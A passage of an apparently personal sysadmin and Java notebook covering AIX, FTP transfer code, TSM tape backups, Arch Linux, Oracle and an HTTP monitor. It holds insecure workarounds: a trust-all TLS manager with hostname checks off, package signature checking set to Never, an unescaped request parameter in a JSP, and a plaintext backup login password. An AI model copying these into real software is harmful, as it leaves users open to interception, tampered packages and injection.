<td><input id="accepted" type="radio" name="legalAdviceStatus" value="a"><label for="accepted">Accepted</label></input><input id="notAccepted" type="radio" name="legalAdviceStatus" value="na"><label for="notAccepted">Not Accepted</label></input><input id="notMentioned" type="radio" name="legalAdviceStatus" value="nm"><label for="notMentioned">Not Mentioned</label></input></td>
</tr>
<tr>
<td><b>Legal Advice Remarks:</b></td>
<td><textarea name="legalAdviceRemarks" rows="5" cols="40"></textarea></td>
</tr>
<tr>
<td><b>Defendant:<span style="color:red">*</span></b></td>
<td><input id="employer" type="checkbox" name="defendantEmployer" value="employer"><label for="employer">Employer</label></input><input id="employee" type="checkbox" name="defendantEmployee" value="employee"><label for="employee">Employee</label></input></td>
</tr>
<tr>
<td><b>Any Authority Reference Mentioned(Y/N):<span style="color:red">*</span></b></td>
<td><input id="authRefIndY" type="radio" name="authRefInd" value="Y"><label for="authRefIndY">Y</label></input><input id="authRefIndN" type="radio" name="authRefInd" value="N"><label for="authRefIndN">N</label></input></td>
</tr>
<tr>
<td><b>Authority Reference:</b></td>
<td><input type="text" name="authRef" size="40" value="" maxlength="50" /></td>
</tr>
<tr>
<td width="35%" valign="top"><b>File Name:<span style="color:red">*</span></b></td>
<td width="65%">
<%
if(reqCode !=null && reqCode.equals("edit")){
final List fileList = caseLegalAdvice.getUploadFiles();
Iterator fileIt = fileList.iterator();
while(fileIt.hasNext()){
String[] file = (String[])fileIt.next();
out.print("<div class='uploadFiles'><span style='display:none'>" + file[0] + "</span><a target='_blank' href='upload/prosecutions/" + file[1] + "'>" + file[1] + "</a>&nbsp;<img class='deleteFile' style='cursor:pointer' src='images/Remove-icon.png'/>");
}
}
%>
<div id="files">
<input type='file' accept='application/pdf' name='file' size='40' />
<input type='file' accept='application/pdf' name='file1' size='40' />
<input type='file' accept='application/pdf' name='file2' size='40' />
<img src="images/Add-icon.png" style="cursor:pointer" id="addFile"/>
<br/>
</td>
</tr>
</table>
<hr noshade size="1" color="#FFFFFF" width="100%">
</td>
</tr>
<tr>
<td width="560">
<div align="right">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2"> <%=(errMsg==null) ? "" : errMsg%> </td>
</tr>
<tr>
<td width="61%">
<input type="hidden" name="reqCode" value='<%=reqCode%>'/>
<input type="hidden" name="keepFileNos" value=''/>
<input type="hidden" name="caseNo" value='<%=request.getParameter("caseNo")%>'/>

<input type="submit" name="save" value="Save">
<%
if(reqCode != null && reqCode.equals("edit")){
out.print("<input type='submit' name='delete' value='Delete'>");
}
%>
</td>
<td width="39%">
<div align="right">
</td>
</tr>
</table>

</td>
</tr>
</table>
<p><br>
</p>
</form>

my aix .profile setting

1
2
3
4
5
6
7
8
export PS1=$USER@`hostname`:'$PWD # ' 
set -o vi

cd /tmp/xx/tools/usr/local/bin

export PATH=$PATH:$(pwd)
export PATH=$PATH:`pwd`
export LIBPATH=/tmp/xx/tools/usr/local/lib

Connect server to upload/download by using ftp4j

My machine’s charset is traditional chinese(cp950) while server’s charset is utf-8, it must be decoded/encoded characters when uploading/downloading.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
package ftp;

import it.sauronsoftware.ftp4j.FTPClient;

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.OutputStreamWriter;

import org.apache.commons.cli.CommandLine;
import org.apache.commons.cli.CommandLineParser;
import org.apache.commons.cli.Options;
import org.apache.commons.cli.PosixParser;

public class FileFetch {

/**
* @param args
* @throws Exception
*/
public static void main(String[] args) throws Exception {
run(args);
//changeFormat("test.txt");
}

private static void changeFormat(String file) throws IOException {
String tmp = "tmp";
InputStreamReader reader = new InputStreamReader(new FileInputStream(
file), "cp936");
OutputStream ow = new FileOutputStream(tmp);

char[] buffer = new char[4096];

int len = 0;
while (len != -1) {
len = reader.read(buffer);
if (len != -1) {
ow.write(new String(new String(buffer, 0, len)
.getBytes("cp936")).getBytes("utf-8"));
}
}
reader.close();
ow.close();

new File(file).delete();
new File(tmp).renameTo(new File(file));
}

private static void run(String[] args) throws Exception {
Options options = new Options();
options.addOption("ip", true, "FTP Server IP");
options.addOption("u", "user", true, "login user name");
options.addOption("p", "password", true, "login password");
options.addOption("rr", "remoateRoot", true,
"remote file path to be fetch");
options.addOption("rd", "remoteDir", true,
"remote file path to be fetch");
options.addOption("d", "drive", true, "storage file path drive");
options.addOption("f", "file", true, "storage file path");
options.addOption("dn", "down", false, "flag to down");
options.addOption("up", "upload", false, "flag to upload");

CommandLineParser parser = new PosixParser();
CommandLine line = parser.parse(options, args);

String ip = line.getOptionValue("ip");
String user = line.getOptionValue("user");
String password = line.getOptionValue("password");
String remoateRoot = line.getOptionValue("remoateRoot");
String remoteDir = line.getOptionValue("remoteDir");
String drive = line.getOptionValue("drive");
String filePath = line.getOptionValue("file");
if (line.hasOption("down")) {
getFiles(ip, user, password, remoateRoot, remoteDir, drive,
filePath, true);
} else if (line.hasOption("upload")) {
getFiles(ip, user, password, remoateRoot, remoteDir, drive,
filePath, false);
}

}

private static void getFiles(String ip, String user, String passwd,
String remoateRoot, String remoteDir, String drive,
String fileName, boolean down) throws Exception {
FTPClient client = new FTPClient();
String[] ret = client.connect(ip);
for (String r : ret) {
System.out.println("out " + r);
}

client.login(user, passwd);

client.changeDirectory(remoateRoot);
client.changeDirectory(remoteDir);
String[] fileNames = client.listNames();
for (String file : fileNames) {
if (file.matches(fileName)) {
String filePath = drive + "/" + remoteDir + "/" + file;
client.setCharset("UTF-8");
if (down) {
File dir = new File(drive + "/" + remoteDir);
if (!dir.exists()) {
dir.mkdirs();
}
OutputStream f = new FileOutputStream(filePath);
client.download(file, f, -1, null);
OutputStreamWriter wr = new OutputStreamWriter(f, "UTF-8");
wr.flush();
wr.close();
changeFormat(filePath);
System.out.println("file " + filePath + " is downloaded.");

} else {
client.upload(new File(filePath));
System.out.println("file " + filePath + " is uploaded.");
}
}
}
}
}

ftpfetch.bat
java -cp bin;lib/ftp4j-1.7.jar;lib/commons-cli-1.2.jar ftp.FileFetch -ip 10.13.135.81 -u root -p password -rr /piers/apps/uat/installedApps/XXApps.ear/xx.war -d C:\xx -up -rd . -f pros.*

Java Subversion Client

Fail to install cc or gcc on aix, and installation of subversion by rpm is fail too.
So download svnkit

1
2
export SVNKIT_LIB=svnkit-1.3.7\lib 
jsvn co url

NFS on AIX

设置客户端的IP

/etc/hosts
10.13.135.47 venus01

添加可以访问的客户端

/etc/exports
/dbbkup -root=venus01

运行

1
2
3
4
5
exportfs -a
showmount -e
stopsrc -g nfs
startsrc -g nfs
lssrc -g nfs

客户端运行

mkdir /mnt/bkup
mount 服务器端:/dbbkup /mnt/bkup

Reference

http://www.cio69.com/html/201118/89.html

openssh on AIX

在AIX上安装ssh

Download openssh(OpenSSH_5.8.0.6102.tar.Z) and openssl(openssl-0.9.8.1800.tar.Z) from
https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp

Procedure:

Uncompress openssl-0.9.8.1800.tar.Z

1
2
tar xvf openssl
smitty install_all

Uncompress OpenSSH_5.8.0.6102.tar.Z

1
2
3
4
5
6
7
8
9
tar xvf openssh
smitty install_all
* INPUT device / directory for software [.] (note a period)
SOFTWARE to install [] using F4
select filesets using F7
openssh.base, openssh.license, openssh.man.en_US,
openssl.base ,openssl.license, and openssl.man.en_US filesets.

Enter yes to accept license agreement

列出有关ssh的已安装文件

lslpp -L|grep ssh

卸装ssh的文件

installp -u openssh.base openssh.license openssh.man.en_US

额外地可以列出安装介质中包含的软件

installp -L -d /dev/cd0

安装失败后如何清理系统

installp -C

Reference:

http://www-01.ibm.com/support/docview.wss?uid=isg3T1012923
http://www.ahinc.com/aix/install.htm

AIX Toolbox

http://gnome.bullfreeware.com/aixtoolbox/RPMS/ppc

Open Source Software Archive for AIX

http://www.bullfreeware.com/
http://www.aixchina.net/?viewnews-16007.html

利用ftp4j删除WAS上的heapdump和javacore文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import it.sauronsoftware.ftp4j.FTPClient;

import java.io.File;

void init(String server, String user, String passwd, String path) {
FTPClient client = new FTPClient();
try {
String[] ret = client.connect(server);
for (String r : ret) {
System.out.println("out " + r);
}
client.login(user, passwd);

client.changeDirectory(path);

if (!new File(server).isDirectory()) {
System.out.println("making directory " + server);
new File(server).mkdir();
}
String[] fileNames = client.listNames();
for (String file : fileNames) {
if (file.indexOf("heapdump") != -1
|| file.indexOf("javacore") != -1) {
System.out.println("download file " + file);
client.download(file, new File(server + "/" + file));
client.deleteFile(file);
System.out.println("file " + file + " deleted.");
}
}
// client.deleteFile("test.txt");
//
client.logout();
client.disconnect(true);
} catch (Exception e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}

void main() {
String server = "server";
String user = "root";
String passwd = "password";
String path = "/usr/WebSphere/AppServer/logs/dhwas1";
if (bsh.args.length > 0) {
server = bsh.args[0];
user = bsh.args[1];
passwd = bsh.args[2];
path = bsh.args[3];
} else {
System.out
.println("usage: java -cp bin;ftp4j-1.7.jar;bsh-2.0b4.jar bsh.Interpreter cleanLog.sh serverName root password /usr/WebSphere/AppServer/logs/dhwas1");
}
init(server, user, passwd, path);
}

main();

Java mail by SSL

如果没有设置证书,会出现以下Exception:

1
Caused by: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target 

要解决这个问题,方法有两个:

  1. java的启动参数添加 -Djavax.net.ssl.trustStore=/path/to/jssecacerts
  2. Add properties in java code
    1
    2
    3
    Properties systemProps = System.getProperties(); 
    systemProps.put( "javax.net.ssl.trustStore", "/path/to/jssecerts");
    System.setProperties(systemProps);

参考:
http://www.rap.ucar.edu/staff/paddy/cacerts/index.html
http://code.google.com/p/java-use-examples/source/browse/trunk/src/com/aw/ad/util/InstallCert.java

TSM的备份命令摘录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
   LOCATE TYPE ID:
tapeutil -f /dev/smc0 inventory | more

1. Login to TSM: dsmadmc(user:support, pass:lovedh02)

2. TSM commands:
CHECK OUT LTO TAPE:
-----------------------------------------------------
q libv
checkout libv LTOLIB DH22S0 remove=no checklabel=no (use label of yesterday tape)
q pro
update volume DH22S0 access=unavailable
q vol DH22S0 format=detailed
------------------------------------------------------
3. Exit TSM: quit

4. commands:
tapeutil -f /dev/smc0 inventory | more
tapeutil -f /dev/smc0 move 4096 16
tapeutil -f /dev/smc0 inventory | more

5. CHANGE TAPE
exit

6. LOG BACK INTO dsmadmc

7. CHECK IN LTO TAPE:
-----------------------------------------------------
(MAKE SURE THE TAPE NUMBER IS CORRECT, WATCHOUT THE DH31S0 HAS BEEN CHANGED TO DH31S1) (today number)

delete v DH21S0 discarddata=yes [notes : delete TODAY's label]

(MAKE SURE IT IS DONE BEFORE GO INTO THE NEXT LINE)
q pro

label libv ltolib search=bulk labelsource=barcode checkin=scratch overwrite=yes

q req

rep ???<output 3 digit from command q req>
(WAIT FOR 2 MINUTES)
(MAKE SURE THERE'S NO ACTIVE PROCESS FOUND)
q pro

q libv

*******************************************************
THE FOLLOWINGS ARE COMMAND OUTPUT:

tsm: TSM>q pro

Process Process Description Status
Number
-------- -------------------- -------------------------------------------------
39 LABEL LIBVOLUME ANR8805I Labelling volumes in library LTOLIB; 0
volumes(s) labelled.\

tsm: TSM>q pro
ANR0944E QUERY PROCESS: No active processes found.
ANS8001I Return code 11.

tsm: TSM>q libv

Library Name Volume Name Status Owner Last Use Home Device
Element Type
------------ ----------- ---------- ---------- --------- ------- ------
LTOLIB DH15S0 Scratch 4,096 LTO

*******************************************************
-----------------------------
8. Exit TSM: quit
exit

--------
define volume LTOSTGPOOL DH24S0
query actlog begindate=today begintime=00:00:00 endtime=09:30:00
q drive
q path
update path tsm ltodrive01 srctype=server desttype=drive library=ltolib device=/dev/rmt1 online=yes
update path tsm ltodrive02 srctype=server desttype=drive library=ltolib device=/dev/rmt2 online=yes
checkin libv LTOLIB DH21S0 status=scratch

q actlog
help query process
select VOLUME_NAME,ACCESS from volumes where access !='READWRITE'

http://publib.boulder.ibm.com/infocenter/tivihelp/v1r1/index.jsp?topic=%2Fcom.ibm.itsmhpn.doc%2Fb_adminref_hpux217.htm
tsm script : http://www.4bcad.com/doc/misc/tsm_cmds
http://adsm.org/forum/showthread.php?21614-LABEL-LIBVOLUME-0-volume(s)-labeled-0-volume(s)-checked-in

Archlinux in VirtualBox

Archlinux安装时候选择

base-devel
kernel header

Sharepoint

mount -t vboxsf sharepoint /mnt/share
download jre1.7u2

Settings

download tomcat
set .profile_bash
export JRE_HOME=/home/jre.1.7.0_02
export PATH=$PATH:$JRE_HOME/bin

网络设置

  1. VirtualBox设置为Bridge模式

  2. 查看IP
    ip addr
    ls /sys/class/net/

  3. 设置IP和DNS
    cat rc.conf
    cat resolv.conf

  4. 设置host主机的浏览器访问192.168.56.*的IP不经过proxy

  5. 设置ssh

设置root的密码:passwd root

6.建立pacman的本地仓库
https://wiki.archlinux.org/index.php/Pacman_Tips#Installing_packages_from_a_CD.2FDVD.2FISO

由于暂时不能上网,所以在pacman.conf文件里注释掉extra和community部分

简单的测试:

1
2
pacman -Syu
pacman -U sqlite3-3.7.7.1-1-i686.pkg.tar.xz
  1. 使用netty的example下的HexDumpProxy作为代理服务器,
    java -cp netty.jar HexDumpProxy 1099 myproxy 8080

设置环境变量 export http_proxy=http://192.168.56.15:1099

export no_proxy="localhost,127.0.0.1,192.168.56.15"
reference: https://wiki.archlinux.org/index.php/Proxy_settings

  1. 使用lynx测试, lynx http://www.google.com

  2. 取消pacman.conf的extra和community的注释(因为之前不能上网),在pacman.d/mirrorlist打开任意一个Server
    pacman -Syu

  3. 下载nginx, pacman -S nginx
    查看pacman -Qil nginx

  4. 运行nginx出现找不到libpcre.so.1的error
    处理

  • export LD_LIBRARY_PATH=/usr/lib
  • ldconfig
  • ln -s /usr/lib/libpcre.so /usr/lib/libpcre.so.1
  1. 安装vsftpd,方便可以在windows上使用editplus编辑文件,然后upload到arch。
    1
    2
    pacman -S vsftp
    /etc/rc.d/vsftpd start

vsftpd.conf

1
2
3
4
5
write_enable=YES
local_enable=YES

注释掉anonymous_enable=YES
由于是standalone模式,所以保持listen=YES

参考
https://wiki.archlinux.org/index.php/Very_Secure_FTP_Daemon
http://os.51cto.com/art/201008/222036.htm

意外情况,安装vsftpd时候,出现很多package的pgp签名有问题的错误,可以参考Archlinux的wiki上pacman-key的文章,我的解决方法是在/etc/pacman.conf中设置SigLevel=Never,不验证package的签名,然后运行

1
2
3
pacman -Syy
pacman -S pacman
pacman -Syu

oracle性能相关

以下视图对性能调整有影响:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
v$db_object_cache
v$filestat
v$latch$v$latch_children
v$lock&v$locked_object
v$open_cursor
v$parameter
v$parameter&v$system_parameter
v$process
v$rollstat
v$rowcache
v$segstat&v$segment_statistics
v$session
v$session_longops
v$session_wait & v$session_event
v$sesstat
v$sga
v$sgastat
v$sql & v$sql_plan
v$sqltext & v$sqlarea
v$sysstat
v$system_event
v$undostat
v$waitstat replyreload += ',' + 240964;
1
2
3
4
5
v$mystat------->mystat ---------->my session stat   当前会话统计

v$sesstat------>sesstat----------->session stat 按会话进行分组统计

v$sysstat------->sysstat----------->system stat 当系统的整体统计

Reference

Oracle性能调整的十大要点 http://www.aixchina.net/home/space.php?uid=44376&do=blog&id=25022

Oracle的SQL语句大全(摘)http://www.aixchina.net/home/space.php?uid=44376&do=blog&id=25080

Oracle内存分配与调整 http://www.aixchina.net/home/space.php?uid=44376&do=blog&id=26579

HttpClient连接https网站

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.HashMap;
import java.util.ResourceBundle;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.TimeUnit;

import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

import javazoom.jl.player.Player;

import org.apache.http.HttpHost;
import org.apache.http.HttpResponse;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.conn.ClientConnectionManager;
import org.apache.http.conn.params.ConnRoutePNames;
import org.apache.http.conn.scheme.Scheme;
import org.apache.http.conn.scheme.SchemeRegistry;
import org.apache.http.conn.ssl.SSLSocketFactory;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.params.CoreConnectionPNames;
import org.apache.http.util.EntityUtils;

public class Monitor {

private static ResourceBundle p = ResourceBundle.getBundle("Config");

public static void main(String[] args) {
int interval = Integer.valueOf(p.getString("interval"));
String do_url = p.getString("do_url");
String pharmweb_url = p.getString("pharmweb_url");
String do_login_url = p.getString("do_login_url");
String pharmweb_login_url = p.getString("pharmweb_login_url");
int timeout = Integer.valueOf(p.getString("timeout"));

String proxyAddress = p.getString("proxy");
int port = Integer.valueOf(p.getString("port"));

String musicPath = p.getString("music_path");

int sendmailCount = Integer.valueOf(p
.getString("sendmail_interrupt_count"));
int existCount = Integer.valueOf(p.getString("exit_interrupt_count"));

ScheduledExecutorService service = Executors
.newSingleThreadScheduledExecutor();
Task task = new Task(do_url, do_login_url, pharmweb_url,
pharmweb_login_url, timeout, proxyAddress, port, musicPath,
sendmailCount, existCount);
service.scheduleWithFixedDelay(task, 0, interval, TimeUnit.SECONDS);
}
}

class Task implements Runnable {
private static final SimpleDateFormat sf = new SimpleDateFormat(
"dd/MM/yyyy HH:mm:ss");

private String do_url ;
private String pharmweb_url ;
private String do_login_url ;
private String pharmweb_login_url ;
private int timeout = 30;
private String proxyAddress = "proxy1.scig.gov.hk";
private int port = 8080;
private String music;
private int sendmailCount;
private int existCount;

private static HashMap<String, Integer> interruptCounter = new HashMap<String, Integer>();
private static int totalErrorConnection = 0;

public Task(String do_url, String do_login_url, String pharmweb_url,
String pharmweb_login_url, int timeout, String proxyAddress,
int port, String music, int sendmailCount, int existCount) {
this.do_url = do_url;
this.do_login_url = do_login_url;
this.pharmweb_url = pharmweb_url;
this.pharmweb_login_url = pharmweb_login_url;
this.timeout = timeout;
this.proxyAddress = proxyAddress;
this.port = port;
this.music = music;
this.sendmailCount = sendmailCount;
this.existCount = existCount;
}

@Override
public void run() {
System.out.printf("=============== %s =====================\n", sf
.format(new Date()));

boolean useProxy = false;
if (!"".equals(this.proxyAddress)) {
useProxy = true;
}

System.out.printf("connect: %s\n", do_url);
if (connectionChecking(do_url, useProxy)) {
System.out.printf("connect: %s\n", do_login_url);
checkDoLogin(do_login_url, useProxy);
}

System.out.printf("connect: %s\n", pharmweb_url);
if (connectionChecking(pharmweb_url, false)) {
System.out.printf("connect: %s\n", pharmweb_login_url);
checkPharmwebLogin(pharmweb_login_url);
}

if (totalErrorConnection > 0) {
System.out.printf("total error connection: [%s]\n",
totalErrorConnection);
if (totalErrorConnection > this.existCount) {
System.exit(0);
}
}

System.out.println("\n");
notifyUser();
}

private void notifyUser() {
for (String url : interruptCounter.keySet()) {
int connectErrors = interruptCounter.get(url);

if (connectErrors > this.sendmailCount) {
System.out.println("send mail to notify users. error url: "
+ url);
interruptCounter.put(url, 0);
}
}
}

private boolean connectionChecking(String url, boolean useProxy) {
DefaultHttpClient client = new DefaultHttpClient();
if (useProxy) {
HttpHost proxy = new HttpHost(proxyAddress, port);
client.getParams().setParameter(ConnRoutePNames.DEFAULT_PROXY,
proxy);
}
client.getParams().setParameter(
CoreConnectionPNames.CONNECTION_TIMEOUT, timeout);

HttpGet httpget = new HttpGet(url);

try {
HttpResponse response = client.execute(httpget);
System.out.println(response.getStatusLine());
return true;
} catch (ClientProtocolException e) {
processException(url, e);
} catch (IOException e) {
processException(url, e);
} finally {
postProcess(client, url);
}
return false;
}

private void checkPharmwebLogin(String url) {
final DefaultHttpClient client = new DefaultHttpClient();
client.getParams().setParameter(
CoreConnectionPNames.CONNECTION_TIMEOUT, timeout);

HttpPost httpget = new HttpPost(url);

try {
HttpResponse response = client.execute(httpget);
System.out.println(response.getStatusLine());
} catch (ClientProtocolException e) {
processException(url, e);
} catch (IOException e) {
processException(url, e);
} finally {
postProcess(client, url);
}
}

private void checkDoLogin(String url, boolean useProxy) {
HttpClient client = WebClientDevWrapper
.wrapClient(new DefaultHttpClient());
HttpPost httpget = new HttpPost(url);

try {
if (useProxy) {
HttpHost proxy = new HttpHost(proxyAddress, port);
client.getParams().setParameter(ConnRoutePNames.DEFAULT_PROXY,
proxy);
}
client.getParams().setParameter(
CoreConnectionPNames.CONNECTION_TIMEOUT, timeout);
HttpResponse response = client.execute(httpget);
System.out.println(response.getStatusLine());

EntityUtils.consume(response.getEntity());
} catch (ClientProtocolException e) {
processException(url, e);
} catch (IOException e) {
processException(url, e);
} finally {
postProcess(client, url);
}
}

private void processException(String url, Exception e) {
e.printStackTrace();
System.out.printf("connect error:[%s]\n ", url);
try {
InputStream in = new FileInputStream(music);
Player player = new Player(in);
player.play();
} catch (Exception e1) {
e1.printStackTrace();
}

int num = 1;
if (interruptCounter.containsKey(url)) {
num = interruptCounter.get(url);
num++;
interruptCounter.put(url, num);
} else {
interruptCounter.put(url, num);
}
System.out.printf("url [%s] interrupt:[%d] \n", url, num);
totalErrorConnection++;
}

private void postProcess(HttpClient client, String url) {
client.getConnectionManager().shutdown();
/*
* if (interruptCounter.containsKey(url)) { interruptCounter.put(url,
* 0); }
*/
}
}

class WebClientWrapper {
public static HttpClient wrapClient(HttpClient base) {
try {
SSLContext ctx = SSLContext.getInstance("TLS");
X509TrustManager tm = new X509TrustManager() {
@Override
public void checkClientTrusted(X509Certificate[] arg0,
String arg1) throws CertificateException {
}

@Override
public void checkServerTrusted(X509Certificate[] arg0,
String arg1) throws CertificateException {
}

@Override
public X509Certificate[] getAcceptedIssuers() {
return null;
}
};

ctx.init(null, new TrustManager[] { tm }, null);
SSLSocketFactory ssf = new SSLSocketFactory(ctx,
SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
ClientConnectionManager ccm = base.getConnectionManager();
SchemeRegistry sr = ccm.getSchemeRegistry();
sr.register(new Scheme("https", 443, ssf));
return new DefaultHttpClient(ccm, base.getParams());

} catch (Exception e) {
e.printStackTrace();
return null;
}
}
}

参考:
http://javaskeleton.blogspot.com/2010/07/avoiding-peer-not-authenticated-with.html
http://javasight.net/2011/06/avoid-javax-net-ssl-sslpeerunverifiedexception/

linux echo颜色控制

echo要变换颜色的时候,要使用参数-e

格式: echo -e “\033[字背景颜色;字体颜色m字符串\033[0m”

例如:
echo -e “\033[41;36m something here \033[0m”

其中41的位置代表底色, 36的位置是代表字的颜色

那些ascii code 是对颜色调用的始末.

\033[ ; m …… \033[0m

让字体变为红色并且不停的闪烁

#echo -e “\033[31m \33[05m 请确认是否要停止当前的squid进程,输入 [Y/N] \033[0m”

或者

#echo -e “\033[31m \033[05m 请确认是否要停止当前的squid进程,输入 [Y/N] \033[0m”

字背景颜色范围:40—-49

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
40:黑 

41:深红

42:绿

43:黄色

44:蓝色

45:紫色

46:深绿

47:白色

字颜色:30———–39

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
30:黑 

31:红

32:绿

33:黄

34:蓝色

35:紫色

36:深绿

37:白色

ANSI控制码的说明

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
\33[0m 关闭所有属性 

\33[1m 设置高亮度

\33[4m 下划线

\33[5m 闪烁

\33[7m 反显

\33[8m 消隐

\33[30m -- \33[37m 设置前景色

\33[40m -- \33[47m 设置背景色

\33[nA 光标上移n行

\33[nB 光标下移n行

\33[nC 光标右移n行

\33[nD 光标左移n行

\33[y;xH设置光标位置

\33[2J 清屏

\33[K 清除从光标到行尾的内容

\33[s 保存光标位置

\33[u 恢复光标位置

\33[?25l 隐藏光标

\33[?25h 显示光标

sqlplus connect oracle

find status and sid:

lsnrctl status
lsnrctl service

connect db

1
sqlplus apps/apps@"(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.100.5)(PORT=1521))(CONNECT_DATA=(SID=OAPROD)))"

运行本地命令

SQL> host dir

export prd

exp user/password tables=task, payment file=payment_task.dmp INDEXES=N CONSTRAINTS=N GRANTS=N ROWS=Y

bakcup uat

exp user/password tables=lic_app, company_cop , company , task, payment file=cop.dmp INDEXES=N CONSTRAINTS=N GRANTS=N ROWS=Y

import uat

imp user/password tables=case_legal_advice file=case_legal_advice.dmp IGNORE=Y
`imp user/ password full=y file=payment_task.dmp IGNORE=Y
``

# background job
`nohup java MyProg > /dev/null 2>&1 &`

最近工作

  1. urlRewriteFilter

  2. Apache(Web) + WAS(App) + Oracle(DB) 研究cluster

  3. IPG-client 支付网关

  4. 用spool处理Change Request

  5. oracle的daily backup 例如:磁带备份(dds, lto), AIX的mksysbackup,需要知道一些AIX的命令

  6. 研究oracle statspack

  7. hypericHQ http://www.springsource.com/downloads/hyperic-open-source-downloads?sid=1417137

  8. F5 load balancing

  9. oracle了解alert log
    9.1. 从Alert_Log看Oracle数据库启动三阶段: http://space.itpub.net/17203031/viewspace-691806
    9.2. 8个DBA最常用的监控Oracle数据库的常用shell脚本: http://blog.csdn.net/tianlesoftware/article/details/4792798

  10. 磁带机工作:

http://bbs.51cto.com/archiver/tid-829311.html

10.1 操作磁带机命令:

1
2
3
4
5
6
7
8
9
10
11
mt
tctl
tapeutil
rmt
tcopy
pax
tar
lsdev -Cc tape
tapeutil -f /dev/smc0 invent|more
lscfg -vps -l rmt0(ent0)
lsattr -El rmt0

操作network的命令

1
2
3
4
5
lsdev -Cc adapter
lsslot -c pci|grep ent
netstat -v ent0
netstat -r
netstat -in ent0

Spring-test + JSF 1.2 + Portlet

jsf Bean

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
@Controller
@Scope("request")
public class FooBean extends AbstractRequestBean {
private static final Logger log = Logger
.getLogger(FooBean.class);

@Autowired
private FooService service;

private String user;

public void setFooService(FooService service){
this.service = service;
}

public String hi(){
String str = getLoginUser() + " say hi to " + getUser();
getPortletRequest().setAttribute("message", str);
return "bar";
}

public void setUser(String user){
this.user = user;
}

public String getUser(){
return user;
}
}

AbstractRequestBean

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import javax.faces.context.FacesContext;
import javax.portlet.PortletRequest;
import javax.servlet.http.HttpServletRequest;

public abstract class AbstractRequestBean {
private String loginUser;
private PortletRequest portletRequest;
private HttpServletRequest servletRequest;

public String getLoginUser() {
if (loginUser == null)
return User.getCurrentUser(getPortletRequest()).getUsername();

return loginUser;
}

public void setLoginUser(String loginUser) {
this.loginUser = loginUser;
}

public PortletRequest getPortletRequest() {
if (portletRequest == null)
return (PortletRequest) FacesContext.getCurrentInstance()
.getExternalContext().getRequest();

return portletRequest;
}

// for jsp/servlet call directly, not jsf bean
public HttpServletRequest getServletRequest() {
if (servletRequest == null)
return (HttpServletRequest) FacesContext.getCurrentInstance()
.getExternalContext().getRequest();

return servletRequest;
}

public void setServletRequest(HttpServletRequest servletRequest) {
this.servletRequest = servletRequest;
}

public void setPortletRequest(PortletRequest portletRequest) {
this.portletRequest = portletRequest;
}

}

FooTest

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
@ContextConfiguration(locations = "/applicationContext.xml")
